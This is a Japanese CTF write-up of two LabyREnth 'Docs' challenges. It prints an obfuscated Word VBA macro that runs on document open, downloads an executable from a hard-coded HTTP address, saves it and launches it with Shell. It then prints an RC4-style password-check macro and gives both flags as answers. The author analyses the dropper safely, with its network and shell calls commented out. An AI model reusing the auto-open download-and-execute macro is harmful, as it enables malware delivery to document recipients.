LabyREnth CTF (Docs)

1. はじめに

 LabyREnth CTF - くじらとたぬきと同じ.

 

2. writeup

・BadMacro (Docs Lv1)

 zipを解凍する(Pass : infected)とchallenge.docが出てくる.

f:id:kmdnet:20160818114912p:plain

 

 challenge.docからVBAを抽出する.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function QklkhFEQNB(HGKuttPaRM As Variant, UBvkWqzieX As Integer)
Dim gsFEVmmIzO, vSHOfSrEta As String, dHLdiEqdts, eUTAbMoUIA
vSHOfSrEta = ActiveDocument.Variables("ppKzr").Value()
gsFEVmmIzO = ""
dHLdiEqdts = 1
While dHLdiEqdts < UBound(HGKuttPaRM) + 2
eUTAbMoUIA = dHLdiEqdts Mod Len(vSHOfSrEta): If eUTAbMoUIA = 0 Then eUTAbMoUIA = Len(vSHOfSrEta)
gsFEVmmIzO = gsFEVmmIzO + Chr(Asc(Mid(vSHOfSrEta, eUTAbMoUIA + UBvkWqzieX, 1)) Xor CInt(HGKuttPaRM(dHLdiEqdts - 1)))
dHLdiEqdts = dHLdiEqdts + 1
Wend
QklkhFEQNB = gsFEVmmIzO
End Function
Public Function BkAIuNwQNDkohBY()
twOvwCSTPL = QklkhFEQNB(Array(5, 5, 27, 65, 89, 98, 85, 86, 71, 75, 66, 92, 95, 98, 67, 64, 89, 83, 84, 95, 26, _
78, 116, 78, 91, 5, 116, 32, 72, 2, 33, 48, 10, 29, 61, 8, 37, 20, 63, 44, 1, _
12, 62, 38, 47, 52, 99, 57, 5, 121, 89, 37, 65, 32, 32, 11, 98, 42, 58, 32, 28, _
9, 3, 117, 85, 4, 57, 10, 94, 0, 16, 8, 28, 42, 30, 121, 71, 6, 8, 9, 37, _
2, 23, 34, 21, 120, 54, 7, 40, 35, 75, 50, 87, 3, 55, 47, 99, 52, 13, 0, 42, _
30, 27, 126, 59, 3, 123, 29, 52, 44, 53, 29, 15, 50, 12, 35, 8, 48, 89, 54, 27, _
62, 28, 8, 36, 49, 119, 104, 14, 5, 64, 34, 43, 22, 71, 5, 46, 7, 66, 42, 0, _
1, 113, 97, 83, 31, 45, 95, 111, 31, 40, 51), 24)
UkIWIEtqCF = QklkhFEQNB(Array(42, 115, 2), 188)
Dim xHttp: Set xHttp = CreateObject(QklkhFEQNB(Array(116, 7, 6, 74, 60, 43, 42, 36, 64, 70, 110, 27, 28, 12, 12, 17, 23), 0))
Dim bStrm: Set bStrm = CreateObject(QklkhFEQNB(Array(15, 32, 32, 53, 35, 89, 22, 25, 65, 53, 51, 26), 176))
xHttp.Open UkIWIEtqCF, twOvwCSTPL, False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17), 2
End With
Shell (QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17))
End Function
Private Sub Document_Open()
If ActiveDocument.Variables("ppKzr").Value <> "toto" Then
BkAIuNwQNDkohBY
ActiveDocument.Variables("ppKzr").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub

 

 しかしこのままでは可読性が悪いので変数名等を書き換えて整形する. 

 

 

 これをVBE上で実行する. ただしHTTPリクエストとシェル実行はされたくないのでコメントアウトして, Debug.Printを用いてイミディエイトウインドウに出力した.

f:id:kmdnet:20160819101747p:plain

 http://10.1.33.7/b64/x58/MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=/evil.exe に注目してb64とx58という文字列があるので, base64とXOR 0x58と予想してPythonでデコードするスクリプトを書いた.

 

 

FLAG : PAN{ViZib13_0nly2th0s3_Wh0_Kn0w_wh3r32l00k}

 

 

・CrackDoc (Docs Lv2)

zipを解凍する(Pass : infected)とCrackDoc.docが出てくる.

f:id:kmdnet:20160819104540p:plain

f:id:kmdnet:20160819104620p:plain

 UserFormにパスワードを入力すれば良い. 同様にVBAを抽出する.

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8AF7E01A-2331-4925-95C1-AA63132A39D5}{BF4AE4DE-16B1-4C4B-ABB6-3A501B9C5B0F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub button_Click()
    x = suchcrypto(key.Text, "General Vidal")
    If x = "171,184,42,184,88,26,47,154,20,219,203,130,52,19,180,214,156,94,186,74,30,248,119,235,139,130,175,141,179,197,8,204,252," Then
        MsgBox "Wow. Good Job! Such crack."
    Else
        MsgBox "U can do. Try harder..."
    End If
End Sub

Function suchcrypto(sMessage, strKey)
    Dim kLen, x, y, i, j, temp
    Dim s(256), k(256)
    kLen = Len(strKey)
    For i = 0 To 255
        s(i) = i
        k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))
    Next
    j = 0
    For i = 0 To 255
        j = (j + k(i) + s(i)) Mod 256
        temp = s(i)
        s(i) = s(j)
        s(j) = temp
    Next
    x = 0
    y = 0
    For i = 1 To 3072
        x = (x + 1) Mod 256
        y = (y + s(x)) Mod 256
        temp = s(x)
        s(x) = s(y)
        s(y) = temp
    Next
    For i = 1 To Len(sMessage)
        x = (x + 1) Mod 256
        y = (y + s(x)) Mod 256
        temp = s(x)
        s(x) = s(y)
        s(y) = temp
 
        suchcrypto = suchcrypto & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
    Next
End Function

 同様にPythonでデコードを行うスクリプトを書く.
 

FLAG : PAN{L4$t_Night_@f@iry_Vizited_M3}

 

3. 補足

 公式にてwriteupが公開されている. 1week毎に1trackずつ公開される模様.

researchcenter.paloaltonetworks.com

 

kmdnet